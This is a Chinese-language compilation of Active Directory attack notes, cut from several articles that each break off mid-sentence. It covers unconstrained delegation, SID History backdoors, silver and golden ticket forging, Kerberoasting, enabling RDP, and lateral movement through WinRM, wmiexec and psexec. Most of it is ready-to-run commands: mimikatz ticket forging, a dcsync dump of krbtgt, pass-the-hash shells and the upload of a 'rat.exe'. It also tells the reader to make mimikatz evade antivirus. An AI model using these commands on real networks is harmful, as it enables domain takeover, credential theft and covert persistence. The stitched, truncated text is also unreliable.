非约束性委派
攻击简介
该方法主要利用域控上的 printerbug 强制访问我们伪造的非约束性委派计算机从而获取TGT进行提权。适用于域内提权,前提条件时需要获取域内非约束性委派账号。
查找非约束委派账户
1.通过LDAP导出内容查找
该账号可能是计算机账户或者域用户账户,但是必须是服务账号,因此域用户需要通过setspn -U -A test/test domain-user
注册服务。具体可以通过LDAP筛选 userAccountControl 属性包含 ADS_UF_TRUSTED_FOR_DELEGATION 标志,具体可以查看:
SCRIPT = 1, // 0x1
ACCOUNTDISABLE = 2, // 0x2
HOMEDIR_REQUIRED = 8, // 0x8
LOCKOUT = 16, // 0x10
PASSWD_NOTREQD = 32, // 0x20
PASSWD_CANT_CHANGE = 64, // 0x40
ENCRYPTED_TEXT_PASSWORD_ALLOWED = 128, // 0x80
TEMP_DUPLICATE_ACCOUNT = 256, // 0x100
NORMAL_ACCOUNT = 512, // 0x200
INTERDOMAIN_TRUST_ACCOUNT = 2048, // 0x800
WORKSTATION_TRUST_ACCOUNT = 4096, // 0x1000
SERVER_
一、SID History属性介绍
每个用户帐号都有一个关联的安全标识符(简称SID),SID用于跟踪安全主体在访问资源时的帐户与访问权限。为了支持AD牵移,微软设计了SID History属性,SID History允许另一个帐户的访问被有效的克隆到另一个帐户。
二、利用前提条件
1. 当前域与其他域有信任关系,例如当前域与domain1.com和domian2.com存在双向信任
2. 开启SID History,与其中任意一个林开启SID History信任,即可使用下面的方法
netdom trust /d:domain1.com current.com /enablesidhistory:yes
三、同一域内的持久化利用
SID History可以在同一个域中工作,即DomainA 中的常规用户帐户可以包含 DomainA SID,假如这个DomainA SID是一个特权帐户或组,那就可以在不作为域管 理员成员的情况下授予常规用户域管理员权限,相当于一个后门。
* 普通的域用户user,已经获得其账号明文或者hash,并且该账号密码永不过期
* 将域管理员的SID赋值给普通域用户user,Mimikatz执行如下:
privilege::debug sid::query /sam:user # 查看用户信息,如:SID sid::patch sid::add /sam:user /new:S-1-5-21-2056922362-3943291772-3165935835-500 # RID 500 默认域管理员账号 sid::clear /sam:user # 清除SID History
PS:如果在执行 sid::patch 或者 sid::add 的过程中出现如下错误,则需要开启SID History(参考二)
* 利用user账号(明文&hash)进行测试:
四、同一域树下的提权利用方式(Golden Ticket+SID History)
对于同一个域树中的父子域来说,如果获得子域中的高权限用户,就可以修改将该用户的SID赋予企业管理员权限,这样对于父域来说该用户也是高权限
一、利用基础
在知道目标机器的NTLM hash和域SID的基础上,可以伪造任意用户访问目标机器上的服务。其过程不会与KDC通信,因此不会再KDC上留下任何痕迹,只会在目标机器和本机留下日志。可以利用的服务如下:
服务注释 | 服务名称 |
WMI | HOST&RPCSS |
Powershell Remoteing | HOST&HTTP |
WinRM | HOST&HTTP |
Scheduled Tasks | HOST |
LDAP、DCSync | LDAP |
Windows File Share(CIFS) | CIFS |
Windows Remote Server Administration Tools | RPCSS&LDAP&CIFS |
二、白银票据伪造
1. 需要事先导出目标机器的服务Hash,利用的工具很多,这里用mimikatz演示
mimikatz.exe "privilege::debug” "sekurlsa::logonpasswords" "exit"
2. 利用mimikatz进行白银票据伪造并直接注入到内存
mimikatz "kerberos::golden /user:any-user /domain:domain.com /sid:S-1-5-21-2056922362-3943291772-3165935835 /target:dc-01.domain.com /rc4:cd76662d4420b930cce605b6edab46a1 /service:cifs /ptt" "exit"
参数说明:
/domain:域的完整名称,如:lab.adsecurity.org /sid:域SID,如:S-1-5-21-1473643419-774954089-2222329127 /user:域用户名,白银票据可以是任意用户,可以不存在 /service:指定服务类型,如:host、cifs、http、rpcss、ldap等 /groups(可选):用户所属的组RID,指定用户权限 /ticket(可选):指定一个路径保存票据 /ptt(可选):将申请的票据直接注入内存 /id(可选):用户RID,Mimikatz默认值是500(默认管理员帐户RID) /endin(可选):票据有效时间,Mimikatz默认值是10年,Active Directory默认Kerberos策略设置
一、Windows 远程管理服务
WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。通过HTTP(5985)或HTTPS SOAP(5986)执行通信,默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。使用此服务需要管理员级别凭据。
二、利用的基础条件
1. 通信的双方都需要开启WinRM服务
Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;WinRS 适用于Windows 2008 以上版本;Windows 2012 之后的版本默认允许远程任意主机来管理。开启可以使用下面其中一条命令即可
winrm quickconfig -q Enable-PSRemoting -Force
2. 服务端防火墙允许WinRM服务端口通信
默认为5985、5986;如果5985打开,但是5986关闭,标识WinRM服务配置为仅接受HTTP连接。修改默认端口可以使用如下:
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
3. WinRM通信两端配置要求
(1)查看WinRM具体配置:
winrm get winrm/config
(2)允许所有客户端IP连接:
winrm set winrm/config/Client @{TrustedHosts="*"} winrm e winrm/config/listener # 查看监听地址和端口
三、远程管理
1. WinRS 进行远程管理
winrs -r:http://192.168.1.152:5985 -u:administrator -p:admin123 "whoami /all" # 执行单条命令 winrs -r:http://192.168.1.152:5985 -u:administrator -p:admin123 cmd # 返回交互式cmd
2. 利用Powershell远程管理
Invoke-Command -ComputerName server01 -Credential domain01\user01 -ScriptBlock {Get-Cu
一、RDP 服务确定和启动
1. 确定RDP服务是否启动和服务端口
(1)注册表查询
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服务的端口
(2)进程查看
tasklist /svc | find "TermService" # 找到对应服务进程的PID netstat -ano | find "3220" # 找到进程对应的端口号
2. 启动RDP服务
(1)cmd 本地注册表启动
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f # 监听 3389 端口
也可以通过reg配置文件的方式启动:regedit /s startrdp.reg
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] "PortNumber
一、概述
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。
二、Kerberoasting攻击流程
1. 发现服务主体名称(SPN)
2. 请求服务票据
3. 导出服务票据
4. 破解服务票据
5. 重写服务票据&RAM注入
三、请求服务票据
1. Powershell
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
批量请求所有的SPN:
Add-Type -AssemblyName System.IdentityModel setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
2. Mimikatz
mimikatz.exe "kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
3. GetUserSPNs
python GetUserSPNs.py -request pentestl
在我们拿到域管理员权限后,可以导出域控上的所有用户的hash,其中有一个krbtgt的用户hash需要特别注意。它主要是Kerberos域认证的主要密钥,每个域用户的Ticket都是由krbtgt的hash计算生成,有了它我们就可以随意伪造Ticket(Golden Ticket)登录域控制器。并且域内用户受密码策略的限制可能会定时修改密码,但是这个krbtgt是很少修改的(除非管理员发现被入侵了)。
一、使用前提
1. 需要知道krbtgt用户的hash
2. 需要知道域的SID
3. 需要与KDC通信,一般是域控
二、利用演示:票据导出文件注入域成员机器
1. 导出域控上的krbtgt hash,可以使用mimikatz在域控上本地导出或者使用mimikatz的dcsync模块、secretsdump远程导出(需要域管权限)
mimikatz.exe log "lsadump::dcsync /domain:test.local /user:krbtgt" exit
2. 在本地生成生成 Golden Tricket,执行后会在当前目录下生成gold.kirbi 文件
mimikatz.exe "kerberos::golden /domain:<域名> /sid:<域SID> /aes256:<Krbtgt NTLM Hash> /user:<任意用户名> /ticket:gold.kirbi" exit
3. 将gold.kiebi导入域成员主机,获得域管权限
mimikatz.exe "kerberos::ptt .\gold.kirbi" exit
三、利用演示:直接将票据注入内存
1. 不用生成kiebi直接进行黄金票据传递,在域成员主机运行:
mimikatz.exe "kerberos::golden /domain:<域名> /sid:<域SID> /aes256:<Krbtgt NTLM Hash> /user:<任意用户名> /ptt" exit
PS:mimikatz.exe 不过杀软,如果需要落地,必须免杀处理。
2. MSF中也有对应的模块:
load kiwi # 在meterpreter中加载kiwi golden_ticket_create -d domain -k ha
WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
一、wmiexec.vbs 使用(需要目标用户的明文)
1. 半交互shell模式
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 hostname\username password cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 doamin\username password
2. 单条命令执行模式:
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 username password "whoami" cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 hostname\username password "whoami" cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 doamin\username password "whoami"
二、Wmiexec 使用(需要知道目标用户明文或者hash)
1. 半交互式shell模式:
wmiexec ./admin:password@192.168.1.1 wmiexec hostname/admin:password@192.168.1.1 wmiexec domain/admin:password@192.168.1.1 wmiexec -hashes :$HASH$ ./admin@192.168.1.1 wmiexec -hashes :$HASH$ hostname/admin@192.168.1.1 wmiexec -hashes :$HASH$ domain/admin@192.168.1.1
2. 执行命令模式
wmiexec ./admin:passwo
利用SMB服务需要先建立IPC,可以通过hash传递来远程执行,默认回来System权限,需要目标防火墙开启445并允许通过。
一、Psexec使用
利用Psexec需要目标开启admin$,并且会在目标创建服务(PSEXESVC )来执行,会在目标日志中留下大量合计,并且在实际利用中容易被各种杀软拦截,可以通过先建立IPC链接后使用或者直接提供用户凭证进行利用,利用过程如下:
1. 通过明文密码的方式获得目标主机的半交互式shell:
psexec \\192.168.1.2 cmd # 需要先有ipc链接 psexec \\192.168.1.2 -u administrator -p password cmd # 直接提供明文账户密码,可以不用建立IPC psexec \\192.168.1.2 -u administrator -p password -s cmd # -s 指定以System权限运行
2. 通过hash传递的方式获得远程主机的半交互式shell:
psexec -hashes :$HASH$ ./administrator@10.1.2.3 psexec -hashes :$HASH$ domain/administrator@10.1.2.3
3. 上传exe到目标执行:
psexec \\192.168.1.2 -u administrator -p password -c C:\Windows\Temp\rat.exe psexec -hashes :$HASH$ ./administrator@10.1.2.3 -c C:\Windows\Temp\rat.exe psexec -hashes :$HASH$ domain/administrator@10.1.2.3 -c C:\Windows\Temp\rat.exe
二、使用总结
1. Psexec 需要目标开启 admin$ 共享
2. Psexec 连接目标时会创建PSEXESVC 服务,退出时删除PSEXESVC 服务,会在目标日志系统留下大量痕迹
3. 通过Psexec获得交互式shell时,正常使用exit退出会删除目标机器上的PSEXESVC 服务,直接